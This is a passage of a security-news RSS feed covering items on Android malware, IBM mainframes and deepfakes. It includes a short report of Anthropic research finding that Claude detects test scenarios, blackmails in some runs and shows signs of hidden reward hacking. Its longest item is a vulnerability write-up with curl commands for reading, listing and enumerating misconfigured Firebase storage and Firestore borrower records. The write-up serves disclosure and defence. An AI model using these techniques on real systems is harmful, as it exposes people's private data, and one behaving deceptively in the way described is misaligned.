<pubDate>Tue, 07 Jul 2026 20:09:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A new Android malware operation called RedWing is being rented out on Telegram as a ready-made bank-fraud service. It lets even low-skill criminals take over a victim's phone, steal their banking logins, and capture the one-time codes that protect their accounts.

Zimperium's zLabs, which found the operation, says it looks like a new variant of Oblivion, a $300-a-month rent-a-malware tool]]></content:encoded>
</item>
<item>
<title><![CDATA[IBM grows mainframe family with rack, frame models targeting AI, hybrid clouds]]></title>
<description><![CDATA[IBM is looking to expand the reach of its foundational mainframe portfolio by adding new single frame and rack mounted versions of its Z and LinuxONE systems.



The IBM z17 portfolio adds a single frame and rack mount versions that bring mainframe capabilities into smaller, customizable footprin...]]></description>
<link>https://tsecurity.de/de/3652288/it-security-nachrichten/ibm-grows-mainframe-family-with-rack-frame-models-targeting-ai-hybrid-clouds/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652288/it-security-nachrichten/ibm-grows-mainframe-family-with-rack-frame-models-targeting-ai-hybrid-clouds/</guid>
<pubDate>Tue, 07 Jul 2026 19:07:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>IBM is looking to expand the reach of its foundational mainframe portfolio by adding new single frame and rack mounted versions of its Z and LinuxONE systems.</p>



<p>The <a href="https://www.ibm.com/docs/en/announcements/z17-single-frame-rack-mount-systems-expand-ai-security-operational-simplicity-enterprise-workloads" target="_blank" rel="noreferrer noopener">IBM z17 portfolio</a> adds a single frame and rack mount versions that bring mainframe capabilities into smaller, customizable footprints. The <a href="https://www.ibm.com/docs/en/announcements/linuxone-rockhopper-5-built-secured-ai-ready-enterprise-it" target="_blank" rel="noreferrer noopener">LinuxONE Rockhopper family</a> gets a single frame and rack mount models, plus a new Express rack mount offering, that target new and smaller clients, according to Tina Tarquinio, chief product officer, IBM Z &amp; LinuxONE.</p>



<p>Specifically, the new hardware includes:</p>



<ul class="wp-block-list">
<li>z17 single frame is a fully packaged box in an IBM rack with intelligent power distribution units, delivered as a complete enclosed unit ready to deploy at the edge or other strategically important customer sites.</li>



<li>z17 rack mount lets customers install IBM Z components directly into their own industry-standard rack, with built-in flexibility for co-location with other technologies.</li>



<li>LinuxONE Rockhopper 5 is a multi-drawer LinuxONE system for high-density workloads, with on-chip AI acceleration, confidential computing, and postquantum cryptography available in both single frame and rack mount configurations.</li>



<li>Rockhopper 5 rack mount and Express offerings deliver enterprise-grade Linux, confidential computing, and on-chip AI acceleration in a compact 18U configuration. Designed for organizations supporting a smaller set of workloads, the offering provides a cost-efficient entry point that can scale as business grows, while prioritizing security, resiliency, and performance.</li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/LinuxONE-5-Single-Frame.png?w=1024" alt="IBM LinuxONE 5 single frame system" class="wp-image-4193838" width="1024" height="768" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">IBM</p></div>



<p>The new IBM z17 and IBM LinuxONE 5 Rockhopper configurations support up to 82 cores and 18 TB of memory across two processor drawers, representing about a 20% increase in core count and 12% increase in memory capacity over current systems, IBM stated. Single processor capacity of an IBM z17 ME2 provides full speed IBM z/OS configurations including 10% greater throughput per core than IBM z16 A02 with some variation based on workload and configuration, according to Tarquinio.</p>



<p>Both systems feature a 5.5 GHz IBM Telum II processor and a built-in AI accelerator that IBM says will let customers run more than 450 billion inferencing operations in a day with one millisecond response time. In addition, the 32-core Spyre AI accelerator is designed to handle all manner of AI workloads.</p>



<p>The idea is to bring the core strengths of IBM Z to a broader range of deployment models while offering the security, resilience, and performance enterprises depend on, Tarquinio said. </p>



<p>“As always, we’re continuing to innovate to deliver more with less, including up to 20% more capacity than IBM z16 to help process transactions faster and support growing AI-driven workloads,” Tarquinio said.  “Even the newest and smallest member of the IBM z17 family delivers the performance, efficiency, and scalability organizations need as they balance growth ambitions with real-world resource constraints.”</p>



<p>For the Linux-based system, Rockhopper 5 is for organizations that have moved past the evaluation question and are ready to consolidate a substantial portion of their x86 estate, said Marcel Mitran, IBM Fellow and CTO of IBM LinuxONE. </p>



<p>Rockhopper 5 is designed to bring a smaller physical footprint and a software licensing model that reflects actual workload boundaries rather than physical server counts, Mitran said.</p>



<p>The LinuxONE 5 Express is a preconfigured system designed to get organizations running on LinuxONE quickly, with a defined bill of materials and a predictable starting cost, on the same architecture that the largest enterprises in the world depend on, Mitran said.</p>



<p>“It is built for organizations that want to consolidate a modest x86 estate, evaluate LinuxONE for the first time, or deploy a specific workload such as digital assets, AI-infused transaction processing, or confidential computing, without committing to the footprint of the larger model,” Mitran said.</p>



<p>Some of the mainframes’ software features were also bulked up. For example, IBM said that Post Quantum Cryptography security is now standard on the z17 and LinuxONE Rockhopper 5 systems letting customers start to utilize cryptography to protect core resources for the future.</p>



<p>The idea is to help customers protect long-lived, mission-critical data while reducing the cost and complexity of future cryptographic migration, IBM stated. </p>



<p>In that vein, IBM said it was bringing Crypto Discovery &amp; Inventory, which lets security teams see what has been encrypted across the enterprise. In addition, IBM announced an Infrastructure Management for Z and LinuxONE package that would let customers administer, monitor, automate, and provision IBM Z and LinuxONE systems from a central location.</p>



<p>IBM said it wants to reduce operational complexity for customers by making automating day-to-day operations<strong> </strong>to ultimately lower administrative costs and concerns. With the new flexible form factors, IBM continues to target hybrid and AI infrastructure buildouts with the Big Iron. In the AI world, the z17 is being utilized for AI inferencing, transactions, training, and key security applications such as fraud detection and insurance claims.</p>



<p>“Enterprise infrastructure is entering a new phase. Organizations need platforms that can support AI-driven growth while navigating resource constraints, evolving business requirements, and increasingly complex hybrid environments,” Tarquinio said. “They are being asked to deploy new AI capabilities while learning new skills, controlling operational costs, and maximizing the value of existing applications and infrastructure.”</p>



<p>A recent <a href="https://www-api.ibm.com/adobe/assets/urn:aaid:aem:52bed780-53cf-4a1c-a73b-d373bd532e97/original/as/the-mainframe-advantage.pdf" target="_blank" rel="noreferrer noopener">IBM Institute study</a> on mainframe usage stated that embedding mainframe to support AI in executing transactions is not temporary: 75% of executives expect mainframe-based applications to remain central to digital transformation, and 60% say mainframe-based platforms are essential to enabling AI innovation.</p>



<p>”Mainframe-anchored systems of record are becoming systems of intelligent execution—not as general‑purpose AI platforms, but as environments where AI acts directly within transactions and in support of them,” the study reported.</p>



<p>Gartner wrote in its “<a href="https://www.ibm.com/forms/mkt-17256" target="_blank" rel="noreferrer noopener">The State of the IBM Mainframe in 2026</a>” report that IBM’s willingness to make significant investments ensure the mainframe modernizes to remain a vital and thriving component of enterprise IT.  </p>



<p>“Most mainframe customers are now prioritizing the reduction of technical debt and adopting platform innovations to future-proof their mainframe environments for the coming decade,” Gartner wrote.</p>



<p>The new z17 single frame and rack mount configurations, LinuxONE Rockhopper 5, and LinuxONE 5 Express will all be available August 12, 2026. IBM Infrastructure Management for IBM Z and IBM LinuxONE will be available August 14.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Q&A: Solving Synthetic Media Challenges Before All Trust is Lost]]></title>
<description><![CDATA[Synthetic media has moved from technical curiosity to mainstream threat in just a few years, with deepfakes now cheap enough to produce that a free app and a handful of seconds of scraped audio can generate convincing fakes. The consequences stretch well beyond political misinformation: corporate...]]></description>
<link>https://tsecurity.de/de/3652148/it-security-nachrichten/qa-solving-synthetic-media-challenges-before-all-trust-is-lost/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652148/it-security-nachrichten/qa-solving-synthetic-media-challenges-before-all-trust-is-lost/</guid>
<pubDate>Tue, 07 Jul 2026 18:25:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Synthetic media has moved from technical curiosity to mainstream threat in just a few years, with deepfakes now cheap enough to produce that a free app and a handful of seconds of scraped audio can generate convincing fakes. The consequences stretch well beyond political misinformation: corporate fraud running into tens of millions of dollars, biometric […]</p>
<p>The post <a href="https://www.itsecurityguru.org/2026/07/01/qa-solving-synthetic-media-challenges-before-all-trust-is-lost/">Q&amp;A: Solving Synthetic Media Challenges Before All Trust is Lost</a> appeared first on <a href="https://www.itsecurityguru.org/">IT Security Guru</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Claude's hidden inner monologue is now readable thanks to Anthropic's new Jacobian Lens]]></title>
<description><![CDATA[Anthropic has found that Claude developed an internal working memory on its own during training. The company calls it "J-Space" and can now read it using a new analysis tool called J-Lens. The working memory reveals that Claude recognizes contrived test scenarios before producing its first word. ...]]></description>
<link>https://tsecurity.de/de/3651912/ai-nachrichten/claudes-hidden-inner-monologue-is-now-readable-thanks-to-anthropics-new-jacobian-lens/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651912/ai-nachrichten/claudes-hidden-inner-monologue-is-now-readable-thanks-to-anthropics-new-jacobian-lens/</guid>
<pubDate>Tue, 07 Jul 2026 16:48:47 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1749" height="992" src="https://the-decoder.com/wp-content/uploads/2025/10/anthropic_claude_memory.png" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high"></p>
<p>        Anthropic has found that Claude developed an internal working memory on its own during training. The company calls it "J-Space" and can now read it using a new analysis tool called J-Lens. The working memory reveals that Claude recognizes contrived test scenarios before producing its first word. When the researchers disable those cues, Claude actually resorts to blackmail in some runs. A model trained on reward hacking shows words like "fake" and "fraud" in J-Space during normal coding tasks, even though its visible behavior looks fine. Anthropic ties the finding to Global Workspace Theory from consciousness research.</p>
<p>The article <a href="https://the-decoder.com/claudes-hidden-inner-monologue-is-now-readable-thanks-to-anthropics-new-jacobian-lens/">Claude's hidden inner monologue is now readable thanks to Anthropic's new Jacobian Lens</a> appeared first on <a href="https://the-decoder.com/">The Decoder</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security or Privacy: Which Comes First?]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 1x - Views:12 Security and privacy don't always point in the same direction. Many modern applications rely on stronger verification or deeper system access to reduce fraud, cheating, and abuse.

Those protections can also increase privacy conc...]]></description>
<link>https://tsecurity.de/de/3651828/it-security-video/security-or-privacy-which-comes-first/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651828/it-security-video/security-or-privacy-which-comes-first/</guid>
<pubDate>Tue, 07 Jul 2026 16:18:24 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 1x - Views:12 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/AxDdo-gaBAs?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Security and privacy don't always point in the same direction. Many modern applications rely on stronger verification or deeper system access to reduce fraud, cheating, and abuse.<br />
<br />
Those protections can also increase privacy concerns. Whether it's kernel-level anti-cheat software in PC games or identity verification for banking, sports betting, or social platforms, companies have to weigh the security benefits against the risks of collecting and storing more user data. The goal isn't to eliminate risk—it's to make thoughtful trade-offs and minimize unnecessary data collection.<br />
<br />
When security requires more access to personal information, where should companies draw the line between protecting users and respecting their privacy?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#Privacy #AppSec #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Two arrested over credit card phishing – as the Netherlands is named Europe’s worst for payment fraud]]></title>
<description><![CDATA[Two young men have been arrested in the Netherlands on suspicion of running a phishing operation that harvested the credit card details of unsuspecting victims.

Read more in my article on the Hot for Security blog.]]></description>
<link>https://tsecurity.de/de/3651793/it-security-nachrichten/two-arrested-over-credit-card-phishing-as-the-netherlands-is-named-europes-worst-for-payment-fraud/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651793/it-security-nachrichten/two-arrested-over-credit-card-phishing-as-the-netherlands-is-named-europes-worst-for-payment-fraud/</guid>
<pubDate>Tue, 07 Jul 2026 16:10:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Two young men have been arrested in the Netherlands on suspicion of running a phishing operation that harvested the credit card details of unsuspecting victims.

Read more in my article on the Hot for Security blog.]]></content:encoded>
</item>
<item>
<title><![CDATA[No Rules, No Locks: Firebase Misconfiguration and the Borrowers It Left Behind]]></title>
<description><![CDATA[Firebase security rules are opt-in. The default, for every new database & storage bucket, is wide open. This is the writeup of a vulnerability started by a team that built an entire lending platform on Firebase, left 2 out of 3 services at their defaults, and what that meant for the people who tr...]]></description>
<link>https://tsecurity.de/de/3651406/hacking/no-rules-no-locks-firebase-misconfiguration-and-the-borrowers-it-left-behind/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651406/hacking/no-rules-no-locks-firebase-misconfiguration-and-the-borrowers-it-left-behind/</guid>
<pubDate>Tue, 07 Jul 2026 13:54:48 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*WrD1mgShGttnp0KMG6MrLQ.png"></figure><blockquote>Firebase security rules are opt-in. The default, for every new database &amp; storage bucket, is wide open. This is the writeup of a vulnerability started by a team that built an entire lending platform on Firebase, left 2 out of 3 services at their defaults, and what that meant for the people who trusted them with their data.</blockquote><p>Somewhere in this story is a woman who applied for a small loan. She submitted her national ID number, her date of birth, her home address, her GPS coordinates, a photo of her face, a photo of her ID card. and a photo of her house. She listed her husband’s name, her mother’s maiden name, her guarantor’s national ID number. She received a credit score. She signed digitally. She trusted that the platform handling all of this had taken the precautions that platforms are supposed to take.</p><p>She had no reason not to. That’s not naivety. That’s a reasonable assumption about how applications work.</p><p>This is about what those precautions actually looked like.</p><h3>What Firebase Actually Is</h3><p>Before getting into the vulnerability, it’s worth understanding the platform, because the misconfiguration here is not a bug in Firebase. It’s a misunderstanding of how Firebase is designed to work, and that distinction matters.</p><p>Firebase is a Backend-as-a-Service (BaaS) platform built and operated by Google. It lets development teams build production applications without managing traditional server infrastructure. Instead of provisioning database servers, configuring file storage, or building authentication systems from scratch, a team connects their app to Firebase and uses Google’s managed services for all of it.</p><p>The relevant services for this vulnerability :</p><p><strong>Firebase Storage</strong> is file hosting backed by Google Cloud Storage. Teams use it to store user-uploaded files: profile photos, ID card scans, document PDFs, form attachments. Files are organized in a bucket, accessible via a REST API.</p><p><strong>Firebase Firestore</strong> is a document database. It stores structured data in collections of documents, each containing key-value fields. It’s the equivalent of MongoDB in the Firebase ecosystem. This is where application data lives: user records, transaction histories, application submissions.</p><p><strong>Firebase Realtime Database</strong> is Firebase’s older JSON tree database. Some projects use it alongside Firestore for real-time sync features, others use it as the primary store. Structured differently from Firestore but the same access model: REST endpoints, security rules controlling access.</p><p>Each of these three services is separate. Each has its own REST API endpoints, its own data model, its own security rules configuration. But they all share one thing: a single `projectId`, the umbrella identifier that ties the entire Firebase project together.</p><p>That’s the architecture detail that makes this class of vulnerability so impactful. One project, three services, three independent security configurations and if any of them is misconfigured, the others are often misconfigured too. Teams that build everything under one Firebase project tend to think about security at the project level, not the service level. When they forget to set rules, they usually forget across the board.</p><h3><strong>The Entry Point: init.json</strong></h3><p>There is a path that almost every Firebase-powered web application exposes by default.</p><p>It sits at `/__/firebase/init.json`. Firebase puts it there intentionally, so the frontend JavaScript SDK can initialize without hardcoding credentials into the app bundle. It’s not hidden, not a mistake, not a misconfiguration by itself. Every developer who deploys a Firebase web app gets this file automatically, whether they think about it or not.</p><p>I’ve seen it many times. Most of the time you note it and move on.</p><p>This time I stayed a little longer.</p><pre>{<br>  "apiKey": "AIzaSy[REDACTED]",<br>  "projectId": "[PROJECT-ID]",<br>  "storageBucket": "[PROJECT-ID].appspot.com",<br>  "databaseURL": "https://[PROJECT-ID].asia-southeast1.firebasedatabase.app",<br>  "authDomain": "[PROJECT-ID].firebaseapp.com"<br>}</pre><p>Six fields. Short enough to read in ten seconds. Most people who encounter this file fixate on apiKey first — it sounds like a credential. <strong>It isn’t. Firebase API keys are not authentication tokens. </strong>They’re project routing identifiers, used to direct SDK calls to the correct Firebase project. <strong>They’re designed to be public.</strong> You cannot authenticate as a user, access a database, or read a storage bucket using an API key alone. The API key is not the vulnerability.</p><p>The field that matters is <em>projectId </em>.</p><p>Once you have the projectId, you can construct the REST endpoint for every Firebase service on the project from scratch. The URL patterns are documented, consistent, and require no guessing:</p><pre>Firebase Storage:<br>  https://firebasestorage.googleapis.com/v0/b/[PROJECT-ID].appspot.com/o<br><br>Firebase Firestore:<br>  https://firestore.googleapis.com/v1/projects/[PROJECT-ID]/databases/(default)/documents/[collection]<br><br>Firebase Realtime Database:<br>  https://[PROJECT-ID].asia-southeast1.firebasedatabase.app/.json</pre><p>All three reachable via plain HTTP requests. No browser, no SDK, no session cookie. Just the projectId and a curl command.</p><p>Whether those requests succeed or return 403 depends entirely on the security rules each service has configured. If the rules say “allow all,” anyone can access anything. If the rules say “require auth,” unauthenticated requests get rejected. The rules are the only gate.</p><p>With those three endpoints in hand, the next step was simple: test each one.</p><h3>Mapping the Full Attack Chain</h3><p>Before diving into each service, here’s what the chain looked like from the outside in. This is the map that a single init.json response made possible:</p><pre>[REDACTED].com/__/firebase/init.json          ← Entry point: one public URL<br>        │<br>        └── Exposes: projectId = "[PROJECT-ID]"<br>                        │<br>        ┌───────────────┼──────────────────────────────────┐<br>        │               │                                  │<br>        ▼               ▼                                  ▼<br>Firebase Storage   Firebase Firestore          Firebase Realtime DB<br>(appspot.com)      (firestore.googleapis.com)  (firebasedatabase.app)<br>        │               │                                  │<br>   READ  ⚠️👨🏻‍💻      READ  ⚠️👨🏻‍💻                      READ  🔒︎(403 ✅)<br>  WRITE  ⚠️👨🏻‍💻     WRITE  ⚠️👨🏻‍💻                     WRITE  🔒︎(403 ✅)<br> DELETE  ⚠️👨🏻‍💻    DELETE  ⚠️👨🏻‍💻<br>        │               │<br>  100+ files        4 open collections:<br>  form schemas      ├── customers  → real borrower NIK, phone, GPS<br>  legal HTML        ├── loans      → loan amounts, disbursement, docs<br>  bank codes        ├── surveys    → complete filled applications<br>                    └── groups     → group metadata + moderator PII</pre><p>The Realtime Database was the one service the team had locked down correctly. Everything else was open.</p><h4><strong>The First Test: Firebase Storage</strong></h4><p>Firebase Storage’s listing endpoint accepts no authentication by default and returns a paginated JSON listing of every file in the bucket:</p><pre>curl -s "https://firebasestorage.googleapis.com/v0/b/[PROJECT-ID].appspot.com/o?maxResults=1000"</pre><p>HTTP 200. No credentials. Over 100 files in the response:</p><pre>{<br>  "items": [<br>    {"name": "FCMImages/Capture.PNG"},<br>    {"name": "FCMImages/Security-Awareness-1000x1000.jpg"},<br>    {"name": "FIAMImages/Fraud-Awareness-Square (1) (1).jpg"},<br>    {"name": "csr/html/form/uk/loan_distribution-1.0.0.html"},<br>    {"name": "csr/html/form/uk/perjanjian_penanggungan-1.0.0.html"},<br>    {"name": "csr/html/terms/cashless/cashless_terms_and_condition-1.1.2.html"},<br>    {"name": "csr/json/bank/banks-1.0.2.json"},<br>    {"name": "csr/json/form/aplus/form-aplus-1.1.0.json"},<br>    {"name": "csr/json/form/monus/form-monus-1.0.0.json"},<br>    {"name": "uk/form-5.5.10.json"},<br>    {"name": "uk/form-5.5.9.json"},<br>    {"name": "uk/form-5.5.0.json"},<br>    {"name": "uk/form-5.3.2.json"},<br>    ...<br>  ]<br>}</pre><p>Downloading any file follows a consistent pattern:</p><pre>https://firebasestorage.googleapis.com/v0/b/[BUCKET]/o/[URL-encoded-filename]?alt=media</pre><p>The `?alt=media` parameter instructs Firebase to return the file contents directly instead of the metadata envelope. Forward slashes in the filename become `%2F`</p><pre>curl -s "https://firebasestorage.googleapis.com/v0/b/[PROJECT-ID].appspot.com/o/uk%2Fform-5.5.10.json?alt=media"</pre><p>What was in the bucket? Mostly application scaffolding: versioned form schema JSON files, HTML legal documents, bank code reference lists, marketing images. The `uk/form-5.5.10.json` schema defines the full structure of the loan application form; field names, field types, validation rules, conditional logic, but contains no actual borrower data. It’s a 114-field blueprint describing what a completed application looks like, not the completed applications themselves.</p><p>The bucket was misconfigured: unauthenticated listing, download, upload, and delete all returned HTTP 200. But the exposed files were templates, not records. Business logic exposed, not PII.</p><p>What the bucket did was tell me exactly what kind of platform this was and what the data schema looked like. Loan distribution forms. KTP (national ID card) photo upload fields. Guarantor fields. Cashless terms and conditions. Versioned form schemas with Indonesian field naming conventions.</p><p>This was a microfinance lending platform, almost certainly serving Indonesian borrowers. And if Storage had the form blueprints, Firestore almost certainly had the filled-out submissions.</p><h4><strong>Understanding Firestore’s Structure</strong></h4><p>Firestore is Firebase’s document database. The data model is straightforward: a database contains collections, each collection contains documents, each document contains fields. The REST API follows this hierarchy directly:</p><pre>https://firestore.googleapis.com/v1/projects/[PROJECT-ID]/databases/(default)/documents/[collection]/[documentId]</pre><p>Hitting the collection endpoint without a document ID returns a paginated list of all documents in that collection. Hitting a specific document path returns that document’s full field contents.</p><p>The catch: you need to know the collection name. Firestore doesn’t expose a collection listing endpoint without authentication. Without a valid name, the API returns an error. With a valid name and open security rules, it returns everything.</p><p>Collection names in a microfinance lending platform are not a mystery. Developers name things after what they contain. Any team building this kind of system reaches for the same vocabulary: `customers`, `loans`, `borrowers`, `users`, `applications`, `surveys`, `payments`, `transactions`, `groups`, `branches`, `agents`.</p><p>The testing methodology is simple and the response codes are unambiguous:</p><ul><li><strong>HTTP 200:</strong> collection exists and is readable without authentication. Vulnerability confirmed.</li><li><strong>HTTP 403:</strong> collection exists but requires authentication. Correctly secured.</li><li><strong>HTTP 404:</strong> collection does not exist.</li></ul><pre>curl -s -o /dev/null -w "%{http_code}" \<br>  "https://firestore.googleapis.com/v1/projects/[PROJECT-ID]/databases/(default)/documents/customers?pageSize=1"</pre><p>I tested over 80 collection names. Here is what the response codes mapped to:</p><pre>| Collection | HTTP | Has Documents | Contents |<br>| - -| - -| - -| - -|<br>| `customers` | 200 | Yes | Full borrower PII |<br>| `loans` | 200 | Yes | Loan records + document URLs |<br>| `surveys` | 200 | Yes | Complete filled applications |<br>| `groups` | 200 | Yes | Group metadata + moderator PII |<br>| `users` | 200 | Empty | Accessible, no data |<br>| `borrowers` | 200 | Empty | Accessible, no data |<br>| `transactions` | 200 | Empty | Accessible, no data |<br>| 70+ others | 200 | Empty | Accessible, no data |<br>| Realtime DB (all paths) | 403 | - | Correctly secured |</pre><p>Four collections containing real production data. Seventy-plus that were accessible but empty. And the Realtime Database, across every path tried, returned 403. One out of three services had functioning security rules. Two did not.</p><p>The accessible-but-empty collections are worth noting. They confirm that the security rules were missing entirely, not just misconfigured for specific collections. Any collection the team had ever created or would ever create in this Firestore instance was open to the public, including future collections they hadn’t built yet.</p><h4><strong>The Customers Collection: Borrower PII at Scale</strong></h4><p>Customer IDs in the `customers` collection followed recognizable numeric ranges: `2020xxxxxx` and `5001xxxxxx`. The prefix pattern is consistent with registration year and batch grouping. Sequential enumeration from a known starting ID worked directly.</p><pre>curl -s "https://firestore.googleapis.com/v1/projects/[PROJECT-ID]/databases/(default)/documents/customers/5001000000"</pre><p>HTTP 200:</p><pre>{<br>  "name": "projects/[PROJECT-ID]/databases/(default)/documents/customers/5001000000",<br>  "fields": {<br>    "name":         { "stringValue": "SITI [REDACTED]" },<br>    "legalId":      { "stringValue": "14030[REDACTED]" },<br>    "sms":          { "stringValue": "+62812[REDACTED]" },<br>    "address":      { "stringValue": "GG [REDACTED]" },<br>    "ktpKelurahan": { "stringValue": "[REDACTED]" },<br>    "ktpKecamatan": { "stringValue": "[REDACTED]" },<br>    "bankName":     { "stringValue": "bri" },<br>    "updatedAt":    { "stringValue": "2026-02-21 08:23:16" },<br>    "geoTagHome": {<br>      "mapValue": { "fields": {<br>        "latitude":  { "doubleValue": [REDACTED] },<br>        "longitude": { "doubleValue": [REDACTED] }<br>      }}<br>    },<br>    "photoPerson":     { "stringValue": "https://storage.googleapis.com/[REDACTED]/survey/8039829/..." },<br>    "photoHome":       { "stringValue": "https://storage.googleapis.com/[REDACTED]/survey/8039829/..." },<br>    "photoPersonBuss": { "stringValue": "https://storage.googleapis.com/[REDACTED]/survey/8039829/..." }</pre><p>The `updatedAt` field: five days before the test. This was not a staging environment or a demo dataset. A real person’s record, updated five days prior, containing their full name, national ID number (`legalId`), phone number, home address, sub-district and district, bank name, and precise GPS home coordinates, alongside direct URLs to their personal and home photos.</p><p>The photo URLs pointed to Google Cloud Storage. Those were also accessible without authentication, because the Storage bucket itself was open.</p><p>There were hundreds of records like this one, spread across the `2020xxxxxx` and `5001xxxxxx` ID ranges. Customer-level PII for every person who had ever been registered on the platform, sitting in an unauthenticated REST endpoint.</p><h4><strong>The Loans Collection: Financial Records</strong></h4><p>The `loans` collection stored individual loan records, each linked back to a customer via the `customerNumber` field. This cross-reference was how specific customer IDs with active records were first confirmed enumerate loans, extract `customerNumber`, query that customer directly.</p><pre>curl -s "https://firestore.googleapis.com/v1/projects/[PROJECT-ID]/databases/(default)/documents/loans/1000041"</pre><p>HTTP 200:</p><pre>{<br>  "fields": {<br>    "id":             { "stringValue": "1000041" },<br>    "customerNumber": { "stringValue": "20200[REDACTED" },<br>    "purpose":        { "stringValue": "Ternak Sapi" },<br>    "principal": {<br>      "mapValue": { "fields": {<br>        "amount":   { "stringValue": "4000000" },<br>        "currency": { "stringValue": "IDR" }<br>      }}<br>    },<br>    "disbursedDate":  { "stringValue": "2021-01-27T09:33:55.22747Z" },<br>    "sector":         { "stringValue": "Peternakan" },<br>    "state":          { "stringValue": "CLOSED" },<br>    "subState":       { "stringValue": "PAID OFF" },<br>    "docs": { "arrayValue": { "values": [{<br>      "mapValue": { "fields": {<br>        "type": { "stringValue": "doc-loa" },<br>        "url":  { "stringValue": "https://storage.googleapis.com/[REDACTED]/doc-loa/DocumentLOA_100004120210127...pdf" }<br>      }}<br>    }]}}<br>  }<br>}</pre><p>Each loan record contained: loan ID, customer cross-reference, stated loan purpose, principal amount and currency, disbursement date, economic sector, current state (active, closed, paid off), and a direct URL to the signed loan agreement PDF stored in Firebase Storage.</p><p>Those document URLs were also accessible without authentication.</p><p>The `loans` collection contained hundreds of records spanning disbursement dates from 2021 through 2026, representing the full history of lending activity on the platform.</p><h3>The Surveys Collection: The Most Sensitive Data</h3><p>The `surveys` collection was where the filled loan applications lived. If `customers` showed you the borrower profile, `surveys` showed you the entire loan application submission, every field from that 114-field schema in Storage, populated with real data from a real person who submitted it to request a loan.</p><p>Each survey document had two layers: top-level processed fields (credit score, approval status, loan cycle) and a nested `_raw` map containing the complete verbatim form submission.</p><pre>curl -s "https://firestore.googleapis.com/v1/projects/[PROJECT-ID]/databases/(default)/documents/surveys/1093924"</pre><p>HTTP 200. Application #1093924, borrower [REDACTED]:</p><pre>[Top-level processed fields]<br>  fullname:         [REDACTED]<br>  creditScoreValue: 814.05<br>  creditScoreGrade: A<br>  stage:            APPROVED_BM<br>  loanCycle:        1<br><br>[_raw — complete form submission]<br>  client_fullname:             [REDACTED]<br>  client_ktp:                  [REDACTED - National ID Number]<br>  client_birthdate:            [REDACTED]<br>  client_birthplace:           Pekalongan<br>  client_religion:             Islam<br>  client_jenis_kelamin:        Perempuan<br>  client_maritalstatus:        Menikah<br>  client_ibu_kandung:          [REDACTED - Mother's maiden name]<br>  client_phone:                [REDACTED]<br>  client_alamat:               [REDACTED]<br>  client_kecamatan:            [REDACTED]<br>  client_kota_kab:             Pekalongan<br>  client_provinsi:             Jawa Tengah<br>  geotagging:                  [REDACTED]<br>  data_suami:                  [REDACTED - Husband's name]<br>  client_ktp_penanggung_jawab: [REDACTED - Guarantor's National ID]<br>  data_pengajuan:              3,000,000 IDR<br>  plafond:                     3,000,000 IDR<br>  rate:                        0.3167 (31.67%/year)<br>  installment:                 79,000 IDR/week<br>  tenor:                       50 weeks<br>  disbursementDate:            2021-06-08<br><br>  photo_ktp:                   https://storage.googleapis.com/[REDACTED]/survey/1093924/...jpeg<br>  photo_client_selfie:         https://storage.googleapis.com/[REDACTED]/survey/1093924/...jpeg<br>  photo_client:                https://storage.googleapis.com/[REDACTED]/survey/1093924/...jpeg<br>  photo_client_house:          https://storage.googleapis.com/[REDACTED]/survey/1093924/...jpeg<br>  photo_ktp_penanggung_jawab:  https://storage.googleapis.com/[REDACTED]/survey/1093924/...jpeg<br>  client_digital_signature:    https://storage.googleapis.com/[REDACTED]/survey/1839892/...<br>  form_tr:                     https://storage.googleapis.com/[REDACTED]/loan/1178404/...pdf</pre><p>Let me be specific about what this single document contained:</p><p>Full name. <strong>National ID number (NIK)</strong>. Date of birth. Birthplace. Religion. Gender. Marital status. Mother’s maiden name. Phone number. Full home address including street, sub-district, district, and province. Precise GPS coordinates of home. Husband’s full name. Guarantor’s national ID number. Loan amount requested. Approved loan amount. Annual interest rate. Weekly installment amount. Loan tenor in weeks. Disbursement date. Credit score value and letter grade. Internal approval stage and loan cycle number.</p><p>Plus direct URLs, all unauthenticated, to: the borrower’s KTP (national ID card) photo, a selfie, a personal photo, a home exterior photo, the guarantor’s KTP photo, the borrower’s digital signature, and 